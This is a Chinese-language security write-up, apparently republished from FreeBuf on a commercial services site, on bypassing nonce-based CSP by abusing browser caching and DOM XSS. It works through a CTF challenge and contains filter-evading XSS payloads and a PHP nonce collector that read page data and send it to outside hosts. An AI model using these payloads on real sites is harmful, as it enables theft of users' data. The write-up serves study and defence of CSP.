通过浏览器缓存来bypass nonce script CSP

发布日期：2024-05-19 浏览次数：专利申请、商标注册、软件著作权、资质办理快速响应热线：4006-054-001 微信：15998557370

* 本文原创作者：LoRexxar，本文属于FreeBuf原创奖励计划，未经许可禁止转载最近看了去年google团队写的文章CSP Is Dead, Long Live CSP!，对csp有了新的认识，在文章中，google团队提出了nonce-{random}的csp实现方式，而事实上，在去年的圣诞节，Sebastian 演示了这种csp实现方式的攻击方式，也就是利用浏览器缓存来攻击，现在来详细分析下。漏洞分析原文查看：http://sirdarckcat.blogspot.jp/2016/12/how-to-bypass-csp-nonces-with-dom-xss.html 国内的翻译（只有翻译）：http://paper.seebug.org/166/ 首先我需要个demo 首先是实现了nonce script的站，然后包含了因为是利用了浏览器缓存，所以我们不能对页面发起请求，因为发起请求之后，后台就会刷新页面并刷新nonce的字符串，符合条件的只有3种。 1. 持久型 DOM XSS，当攻击者可以强制将页面跳转至易受攻击的页面，并且 payload 不包括在缓存的响应中（需要提取）。 2. 包含第三方 HTML 代码的 DOM XSS 漏洞（例如，fetch(location.pathName).then(r=>r.text()).then(t=>body.innerHTML=t);） 3. XSS payload 存在于 location.hash 中的 DOM XSS 漏洞（例如 https://victim/xss#!foo?payload=）这里首先我们需要一个开启了nonce script规则的站，并加入一个xss点 /csp/test.php iframe引用然后我们需要利用iframe引入这个页面，并对其发起请求获取页面内容，这里我们通过向其中注入一个标签来吃掉后面的script标签，这样就可以获取内容。 attack.php 获取nonce字符串然后我们需要一个页面去获取nonce字符串，为了反复获得，这里需要开启session。 <?php session_start(); if(!empty($_POST)){ $message = $_POST['nonce']; preg_match('/(nonce=\')\w+\'/', $message, $matches); $nonce_number = substr($matches[0], 7, -1); $_SESSION['nonce'] = $nonce_number; echo $nonce_number; }else if(!empty($_SESSION['nonce'])){ echo $_SESSION['nonce']; } ?> 一切就绪了，唯一的问题就是在nonce script上，由于csp开启的问题，我们没办法自动实现自动提交，也就是攻击者必须要使按钮被点击，才能实现一次攻击。 nonce绕过实例-pwnhub绝对防御为了研究整个漏洞的限制性，我专门写了一个pwnhub的题目。题目环境大概是这样的。前台是个聊天版，可以发给任何人，有简单的xss过滤，但是可以随便绕过在admin的聊天版里可以找到后台的信息，通过构造任意xss获得后台地址。 Wow, good guys,maybe you want /adminshigesha233e3333/#admin 打开看一眼发现敏感信息右键看源码是这样的存在dom xss，看看返回头还可以发现更多信息。服务端不但开启了最新版的nonce csp，而且还开启了浏览器缓存这就让我们有了可乘之机，就如同上面提到的一样，如果我们仅修改location.hash，浏览器不会请求服务器，那么nonce string就不会更换。那么思路就很清楚了，我们可以在主站构造xss，先开iframe请求admin目录的，获取到nonce值后，再新建一个iframe，添加带有nonce字符串的iframe窗口，执行任意xss <scrscriptipt> window.oonnload=setTimeout(functioonn(){ var f=document.getElementsByTagName("iframe")[0]; var n=f.coonntentWindow.document.getElementsByTagName("scrscriptipt")[0]. getAttribute("noonnce"); coonnsole.log(n); var f2=document.createElement("iframe"); var u="/adminshigesha233e3333#"; var p="<scr"+"ipt noonnce='"+n+"' src='../static/js/jquery.min.js'></scr"+"ipt><scri"+"pt noonnce='"+n+"'>$.get('/adminshigesha233e3333/flag.php',functioonn(da ta){top.locatioonn.href='//x.x.x.x/?c='+escape(data)});</scr"+"ipt>"; f2.src=u+p; document.body.appendChild(f2); },1000); </scrscriptipt> 总结但是让我回过头来总结下上面的利用条件： 1、目标站开启了缓存机制。 2、目标站同源下存在未被csp保护的存在xss的站点。但事实上，我们本可以用更简单的方式获得目标站的flag，比如构造一个iframe引入flag.php，然后读iframe内容，在同源的情况下是允许的。 payload如下 <scriscriptpt> if(locatioonn.pathname != "/xsstest_new/api/getmessage.php"){ window.locatioonn.href = "http://" + document.domain + "/xsstest_new/api/getmessage.php" } functioonn getNoonnce() { var xhr = new XMLHttpRequest(); xhr.open("GET", "[http://115.28.78.16/noonnce.php](http://115.28.78.16/noonnce.php)", false); xhr.send(); return xhr.respoonnseText; } setTimeout(pollNoonnce, 1000); functioonn pollNoonnce() { var noonnce = getNoonnce(); if (noonnce == "") { setTimeout(pollNoonnce, 1000); } else { attack(noonnce); } } functioonn attack(noonnce) { var iframe = document.createElement("iframe"); var url = "[http://52.80.63.91/adminshigesha233e3333/#](http://52.80.63.91/adminshigesha233e3333/#)" var payload = "<scriscriptpt noonnce='" + noonnce + "'>var xmlhttp = new XMLHttpRequest(); xmlhttp.open(\\"GET\\", \\"flag.php\\", false); xmlhttp.send(); var mess = xmlhttp.respoonnse; var xhr = new XMLHttpRequest(); locatioonn.href=\\"[http://0xb.pw?](http://0xb.pw?)\\"+mess;</scr" + "ipt>"; iframe.src = url + payload; document.body.appendChild(iframe); } </script> 如果被攻击者点击提交按钮，那么攻击者就可以获取想要的所有信息了。回顾漏洞，我们不难发现整个漏洞处处都受到同源策略的限制，而且如果在chrome环境下，还会受到xss auditor的限制，所以虽然nonce script csp存在理论被绕过的可能，但是被作为CSP的新解决方案来说，前景仍然光明。 * 本文原创作者：LoRexxar，本文属于FreeBuf原创奖励计划，未经许可禁止转载</p> </div> <div align="center"><a href="https://www.jiqunzhihui.net" target="_blank"><img src="https://www.jiqunzhihui.net/uploads/allimg/221203/1_1248023221.png" height="300" alt="通过浏览器缓存来bypass nonce script CSP" /></a><br /><br /></div> <div class="ft"> <ul> <li>上一篇：<a href='/a/stcs3/322/'>使用python和tableau对数据进行抓取及可视化</a> </li> <li>下一篇：<a href='/a/stcs3/324/'>WannaCry的一个编码错误，也许能帮我们恢复加密文</a> </li> </ul> </div> </div> <script language="javascript"> var content_width; var imgObj = $(".article").find("img"); if (imgObj.length > 0) { for (var i = 0; i < imgObj.length; i++) { if (imgObj[i].width > 892) imgObj[i].width = 892; } } </script> </div> </div> </div> <div class="container"> <div class="b-1"> <h2>代写全部资料成功率全网领先不成功免费重报一直到干到过承诺保障精品服务限时秒杀中……</h2> <ul class="clearfix"> <li><a href="https://www.jiqunzhihui.net/rjzzq/249/" target="_blank"> <img src="/style/images/ico1.png" width="101" height="94" alt="软件著作权申请" /> <div class="r"> <h3>软件著作权</h3> <p>一对一/代写材料/高通过率</p> <div class="d"><em>666元起</em></div> </div> </a> </li> <li> <a href="https://www.jiqunzhihui.net/shangbiao/gn/231/" target="_blank"> <img src="/style/images/ico2.png" width="101" height="94" alt="商标注册" /> <div class="r"> <h3>商标代理注册</h3> <p>顾问式服务，限时优惠中！</p> <div class="d"><em>499元起</em></div> </div> </a> </li> <li> <a href="https://www.jiqunzhihui.net/zlfw/syxxzl/255/" target="_blank" target="_blank"> <img src="/style/images/ico3.png" width="101" height="94" alt="实用新型专利代写" /> <div class="r"> <h3>实用新型专利</h3> <p>专业老师代写，全程省心！</p> <div class="d"><em>1875元起</em></div> </div> </a> </li> <li> <a href="https://www.jiqunzhihui.net/aqfw/zyrjcp/276520/" target="_blank"> <img src="/style/images/ico4.png" width="101" height="94" alt="软件产品登记测试报告" /> <div class="r"> <h3>软件产品登记测试</h3> <p>国家级认证机构发证，权威！</p> <div class="d"><em>2199元</em></div> </div> </a> </li> </ul> <ul class="clearfix"> <li><a href="https://www.jiqunzhihui.net/hyzzdb/zzdxywxkz/187212/" target="_blank"> <img src="/style/images/ico1.png" width="101" height="94" alt="ICP增值电信许可证" /> <div class="r"> <h3>ICP增值电信许可证</h3> <p>代写全部材料、素材</p> <div class="d"><em>4500元</em></div> </div> </a> </li> <li> <a href="https://www.jiqunzhihui.net/hyzzdb/zzdxywxkz/187213/" target="_blank"> <img src="/style/images/ico2.png" width="101" height="94" alt="EDI增值电信许可证" /> <div class="r"> <h3>EDI增值电信许可证</h3> <p>电商网站合规必备</p> <div class="d"><em>6000元</em></div> </div> </a> </li> <li> <a href="https://www.jiqunzhihui.net/shangbiao/gn/244/" target="_blank" target="_blank"> <img src="/style/images/ico3.png" width="101" height="94" alt="商标驳回复审" /> <div class="r"> <h3>商标驳回复审</h3> <p>高成功率不成功退款</p> <div class="d"><em>2000元</em></div> </div> </a> </li> <li> <a href="https://www.jiqunzhihui.net/AAA/338/" target="_blank"> <img src="/style/images/ico4.png" width="101" height="94" alt="AAA认证" /> <div class="r"> <h3>AAA认证7证1牌</h3> <p>爆款促销，超划算！</p> <div class="d"><em>1800元</em></div> </div> </a> </li> </ul> </div></div> <div class="footer" id="gwogojzzbo"> <div class="wrap"> <div class="w-1 clearfix"> <div class="ftnav clearfix"> <dl> <dt style="color:#AEAEAE">关于我们</dt> <dd><a href="https://www.jiqunzhihui.net/ptjj/">平台简介</a></dd> <dd><a href="https://www.jiqunzhihui.net/fwlc/">服务流程</a></dd> <dd><a href="https://www.jiqunzhihui.net/fwcs/">服务城市</a></dd> <dd><a href="https://www.jiqunzhihui.net/fkzh/">付款账号</a></dd> <dd><a href="https://www.jiqunzhihui.net/fpsq/">发票申请</a></dd> <dd><a href="https://www.jiqunzhihui.net/jmhz/">加盟合作</a></dd> <dd><a href="https://info.jiqunzhihui.net" target="_blank">信息中心</a></dd> <dd><a href="https://www.jiqunzhihui.net/xydl/">校园代理</a></dd> <dd><a href="http://down.jiqunzhihui.com.cn/%E4%BA%91%E4%BC%81%E6%9C%8D%E5%AE%A3%E4%BC%A0%E5%86%8C2024-1.pdf" target="_blank">宣传册2023</a></dd> <dd><a href="http://down.jiqunzhihui.com.cn/%E4%BA%91%E4%BC%81%E6%9C%8D%E5%AE%A3%E4%BC%A0%E5%86%8C2024-2.pdf" target="_blank">最新价格表</a></dd> </dl> <dl> <dt style="color:#AEAEAE">热门服务</dt> <dd><a href="https://www.jiqunzhihui.net/shangbiao/gn/" target="_blank">商标注册</a> | <a href="https://www.jiqunzhihui.net/shangbiao/gn/236/" target="_blank">商标转让</a> | <a href="https://www.jiqunzhihui.net/shangbiao/gn/237/" target="_blank">续展</a></dd> <dd><a href="https://www.jiqunzhihui.net/rwyxtg/" target="_blank">全网软文营销</a> | <a href="https://www.jiqunzhihui.net/rwyxtg/rwfbfw/167/" target="_blank">43网站套餐</a></dd> <dd><a href="https://www.jiqunzhihui.net/wzjs/qymhwzjs/" target="_blank">网站建设</a> | <a href="https://www.jiqunzhihui.net/SEOandSEM/" target="_blank">网站优化</a> | <a href="https://www.jiqunzhihui.net/aqfw/stcs/" target="_blank">安全</a></dd> <dd><a href="https://www.jiqunzhihui.net/iso/" target="_blank">ISO体系认证</a> | <a href="https://www.jiqunzhihui.net/fwtc/275222/" target="_blank">三体系特惠</a></dd> <dd><a href="https://www.jiqunzhihui.net/AAA/" target="_blank">AAA资质认证</a> | <a href="https://www.jiqunzhihui.net/AAA/338/" target="_blank">7证1牌双网</a></dd> <dd><a href="https://www.jiqunzhihui.net/rjzzq/" target="_blank">软件著作权</a> | <a href="https://www.jiqunzhihui.net/rjzzq/249/" target="_blank">666包写包过</a></dd> <dd><a href="https://www.jiqunzhihui.net/zlfw/syxxzl/" target="_blank">实用新型专利</a> | <a href="https://www.jiqunzhihui.net/zlfw/syxxzl/255/" target="_blank">1875包过</a></dd> <dd><a href="https://www.jiqunzhihui.net/hyzzdb/zzdxywxkz/187212/" target="_blank">增值电信业务许可证ICP证</a></dd> <dd><a href="https://www.jiqunzhihui.net/hyzzdb/zzdxywxkz/187213/" target="_blank">增值电信业务许可证EDI证</a></dd> <dd><a href="https://www.jiqunzhihui.net/bqdj/" target="_blank">版权登记</a> | <a href="https://www.jiqunzhihui.net/aqfw/zyrjcp/276520/" target="_blank">2199软件登记测试</a></dd> </dl> <dl> <dt style="color:#AEAEAE">热门地区</dt> <dd><a href="https://www.jiqunzhihui.net/beijing/" target="_blank">北京</a>|<a href="https://www.jiqunzhihui.net/shenzhen/" target="_blank">深圳</a>|<a href="https://www.jiqunzhihui.net/dalian/" target="_blank">大连</a>|<a href="https://www.jiqunzhihui.net/anshan/" target="_blank">鞍山</a></dd> <dd><a href="https://www.jiqunzhihui.net/shanghai/" target="_blank">上海</a>|<a href="https://www.jiqunzhihui.net/guangzhou/" target="_blank">广州</a>|<a href="https://www.jiqunzhihui.net/shenyang/" target="_blank">沈阳</a>|<a href="https://www.jiqunzhihui.net/fushun/" target="_blank">抚顺</a></dd> <dd><a href="https://www.jiqunzhihui.net/hangzhou/" target="_blank">杭州</a>|<a href="https://www.jiqunzhihui.net/wuhan/" target="_blank">武汉</a>|<a href="https://www.jiqunzhihui.net/panjin/" target="_blank">盘锦</a>|<a href="https://www.jiqunzhihui.net/benxi/" target="_blank">本溪</a></dd> <dd><a href="https://www.jiqunzhihui.net/changsha/" target="_blank">长沙</a>|<a href="https://www.jiqunzhihui.net/tianjin/" target="_blank">天津</a>|<a href="https://www.jiqunzhihui.net/yingkou/" target="_blank">营口</a>|<a href="https://www.jiqunzhihui.net/dandong/" target="_blank">丹东</a></dd> <dd><a href="https://www.jiqunzhihui.net/changchun/" target="_blank">长春</a>|<a href="https://www.jiqunzhihui.net/haerbin/" target="_blank">哈尔滨</a>|<a href="https://www.jiqunzhihui.net/hebei/" target="_blank">河北</a>|<a href="https://www.jiqunzhihui.net/jinzhou/" target="_blank">锦州</a></dd> <dd><a href="https://www.jiqunzhihui.net/chongqing/" target="_blank">重庆</a>|<a href="https://www.jiqunzhihui.net/suzhou/" target="_blank">苏州</a>|<a href="https://www.jiqunzhihui.net/tangshan/" target="_blank">唐山</a>|<a href="https://www.jiqunzhihui.net/shijiazhuang/" target="_blank">石家庄</a></dd> <dd><a href="https://www.jiqunzhihui.net/chengdu/" target="_blank">成都</a>|<a href="https://www.jiqunzhihui.net/nanjing/" target="_blank">南京</a>|<a href="https://www.jiqunzhihui.net/liaoning/" target="_blank">辽宁</a>|<a href="https://www.jiqunzhihui.net/qinhuangdao/" target="_blank">秦皇岛</a></dd> <dd><a href="https://dalian.jiqunzhihui.com.cn/" target="_blank">大连镜像</a>|<a href="https://hk.jiqunzhihui.com.cn/" target="_blank">香港镜像</a>|<a href="https://www.jiqunzhihui.net/handan/" target="_blank">邯郸</a></dd> <dd><a href="https://net.jiqunzhihui.com.cn/" target="_blank">北京镜像</a>|<a href="https://chengdu.jiqunzhihui.com.cn/" target="_blank">成都镜像</a></dd> <dd><a href="https://tianjin.jiqunzhihui.com.cn/" target="_blank">天津镜像</a>|<a href="https://chongqing.jiqunzhihui.com.cn" target="_blank">重庆镜像</a></dd> </dl> <dl> <dt style="color:#AEAEAE">旗下平台</dt> <dd><a href="https://www.jiqunzhihui.com/" target="_blank">集群智慧®公司官网</a></dd> <dd><a href="https://www.jiqunzhihui.net/" target="_blank">集群智慧®云企服</a></dd> <dd><a href="https://www.jiqunzhihui.org.cn/" target="_blank">集群智慧®云科服</a></dd> <dd><a href="https://www.jiqunzhihui.net.cn/" target="_blank">集群智慧®云安服</a></dd> <dd><a href="https://www.xiaoanyun.org.cn/" target="_blank">集群智慧®校安云</a></dd> <dd><a href="https://www.jiqunzhihui.com.cn/" target="_blank">集群智慧®云传媒</a></dd> <dd><a href="https://www.dlouyun.cn/" target="_blank">集群智慧®水产云</a></dd> <dd><a href="https://www.ixyzz.com/" target="_blank">小鱼壮壮®水产网</a></dd> <dd><a href="https://www.yuyebaike.com/" target="_blank">小鱼壮壮®渔业资讯</a></dd> <dd><a href="http://www.shiziyun.cn/" target="_blank">师资云</a> <a href="https://www.dahaida.cn/" target="_blank">大海大商城</a></dd> </dl> </div> <div class="ftcon"> <h2>联系我们</h2> <p>目前公司位于辽宁大连，北京、深圳设有办事处，更多城市正在筹建中，敬请期待！关注“集群智慧云”微信公众号，微信号：jqzhyun，第一时间获得最新资讯。</p> <img src="/style/images/153569786572302900.jpg" width="90" height="90" alt="关注我们" /> </div> </div> <div class="w-2 clearfix"> <div class="w-2-z"> <div class="p" style="color:#737373">热门专题：<span><a href="https://www.jiqunzhihui.net/zlfw/syxxzl/" target="_blank">职称评审专利快办</a> <a href="https://www.jiqunzhihui.net/ftools/" target="_blank">免费企服工具</a> <a href="#" target="_blank">香港公司注册</a> <a href="https://www.jiqunzhihui.net/hyzzdb/zzdxywxkz/" target="_blank">增值电信业务许可证全国通办</a> <a href="https://www.jiqunzhihui.net/hyzzdb/zzdxywxkz/273294/" target="_blank">辽宁增值电信业务ICP许可证</a> <a href="https://www.jiqunzhihui.net/fwtc/275222/" target="_blank">ISO三大体系特惠套餐14999</a><br /><a href="https://www.jiqunzhihui.net/rjcpcsdjqg/" target="_blank">软件产品登记测试全国受理</a> <a href="https://www.jiqunzhihui.net/rjzzqqg/" target="_blank">软件著作权666元代写全部资料全国受理</a> <a href="https://www.jiqunzhihui.net/zlfw/syxxzl/255/" target="_blank">实用新型专利1875代写全部资料全国受理</a></span></div> <div class="p" style="color:#737373">企服专题资讯：<span><a href="http://sec.jiqunzhihui.net/" target="_blank">网络安全</a> <a href="https://www.jiqunzhihui.net/xiaoqi/" title="校企合作数据库" target="_blank">校企合作数据库</a> <a href="https://www.jiqunzhihui.net/zhuanlidb/" title="最新专利数据库" target="_blank">专利数据库</a> <a href="https://www.jiqunzhihui.net/law/" title="知识产权法律法规" target="_blank">知识产权法律法规</a></span></div> <div class="p" style="color:#737373">一站式企业服务平台：<span><a href="https://www.jiqunzhihui.net/" target="_blank">集群智慧®云企服</a> <a href="https://www.jiqunzhihui.net.cn/" target="_blank" >集群智慧®云安服</a> <a href="https://www.jiqunzhihui.org.cn/" target="_blank">集群智慧®云科服</a> <a href="https://www.gaojianyun.cn/" target="_blank">稿件云</a> <a href="http://www.shangbiaofushen.cn/" target="_blank">商标复审</a> <a href="https://www.jqzhyun.com/" target="_blank">集群智慧云</a> <a href="https://www.xiaoanyun.org.cn/" target="_blank">集群智慧®校安云</a> <a href="https://www.dlouyun.cn/" target="_blank">大海大水产云</a><br /><a href="https://www.dahaida.cn/" target="_blank">大海大商城</a> <a href="https://www.39haishen.com/" target="_blank">大连海参网</a> <a href="https://www.jqzhyun.net" title="软件著作权、版权登记服务平台" target="_blank">版权云</a> <a href="https://www.jiaoshizhuye.com/" title="全国教师主页" target="_blank">教师主页</a></span></div> <div class="copyright"> <p> 公司地址：大连市中山区曼哈顿大厦A座2610室运营中心：大连市沙河口区金盾路127号研发中心：大连市西岗区大工西岗科创产业园10层邮政编码：116029<br /> 全国客户服务热线：4006-054-001 业务咨询：159-9855-7370 / 173-0411-9111 董经理售后座机 / 传真：0411-83767788 电子邮件：Djy@Jiqunzhihui.com<br /> 集群智慧®为我公司注册商标，在商标国际分类第1、7、9、11、20、30、35、36、37、38、40、41、42、44、45类用途中受法律保护，侵权必究。<br /> 本企业已通过ISO9001国际质量管理体系认证、ISO45001职业健康安全管理体系认证、ISO14001环境管理体系认证、企业信用等级AAA级认证，科技型中小企业认证、高新技术企业认证。<br /> 本站部分文章来源为用户投稿上传或网络转载，如因工作失误侵害了第三方相关权益，请及时与我们联系，侵权删除信息请发邮件至：2544906@QQ.com<br /> 本站部分服务由本平台认可的第三方服务机构提供，如服务的质量有任何问题，请第一时间向我平台反馈，我们将及时为您解决，平台保障用户的全部权益不受任何损害。<br /> 请认准本站网址（www.jiqunzhihui.net），推荐百度搜索“<a href="https://www.baidu.com/s?ie=utf-8&f=8&rsv_bp=1&rsv_idx=1&tn=baidu&wd=%E9%9B%86%E7%BE%A4%E6%99%BA%E6%85%A7%E4%BA%91%E4%BC%81%E6%9C%8D&fenlei=256&rsv_pq=0xbca4f7d4000f83bb&rsv_t=6a8c57LClfrgzWvDJD5LufiLyDobvIZQvTI2QQxZ40uRHa%2FCSSlynQA5riO4&rqlang=en&rsv_enter=1&rsv_dl=ib&rsv_sug3=28&rsv_sug1=21&rsv_sug7=100&rsv_sug2=0&rsv_btype=i&inputT=3514&rsv_sug4=4399" target="_blank">集群智慧云企服</a>”直达本站。<br /> 版权所有：大连集群智慧科技服务有限公司 ICP备案：<a href="https://beian.miit.gov.cn/#/Integrated/index" target="_blank" style="color:#737373">辽ICP备2021010330号-1</a> <img src="/uploads/allimg/240326/1_1831541501.png" height="18" width="16" /><a href="http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=21020302000547" target="_blank" style="color:#737373">辽公网安备21020302000547号</a> 增值电信业务经营(ICP/EDI)许可证：辽B2-20230179 <a href="https://www.jiqunzhihui.net/m/" target="_blank" style="color:#737373">手机版</a></p> </div> </div> </div> </div> <script> var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?375c9b7059695e3d0c6f9f09849a6cc2"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); </script> <script> (function(a,h,c,b,f,g){a["UdeskApiObject"]=f;a[f]=a[f]||function(){(a[f].d=a[f].d||[]).push(arguments)};g=h.createElement(c);g.async=1;g.charset="utf-8";g.src=b;c=h.getElementsByTagName(c)[0];c.parentNode.insertBefore(g,c)})(window,document,"script","https://assets-cli.s4.udesk.cn/im_client/js/udeskApi.js","ud"); ud({ "code": "1k6160k6", "link": "https://d1597370.s4.udesk.cn/im_client/?web_plugin_id=49721" }); </script> <script> (function(b,a,e,h,f,c,g,s){b[h]=b[h]||function(){(b[h].c=b[h].c||[]).push(arguments)}; b[h].s=!!c;g=a.getElementsByTagName(e)[0];s=a.createElement(e); s.src="//s.union.360.cn/"+f+".js";s.defer=!0;s.async=!0;g.parentNode.insertBefore(s,g) })(window,document,"script","_qha",537322,false); </script> </div> </body> </html>

专业百科：	ISO百科	专利知识	商标知识	版权知识
热销知产：	实用专利Hot!	发明专利	软著申报Hot!	商标申请
热销企服：	AAA认证Hot!	ISO认证Hot!	ICP许可证Hot!	EDI许可证
网络服务：	网站建设	渗透测试Hot!	代码审计Hot!	软文营销Hot!

信息中心Infomation Center

通过浏览器缓存来bypass nonce script CSP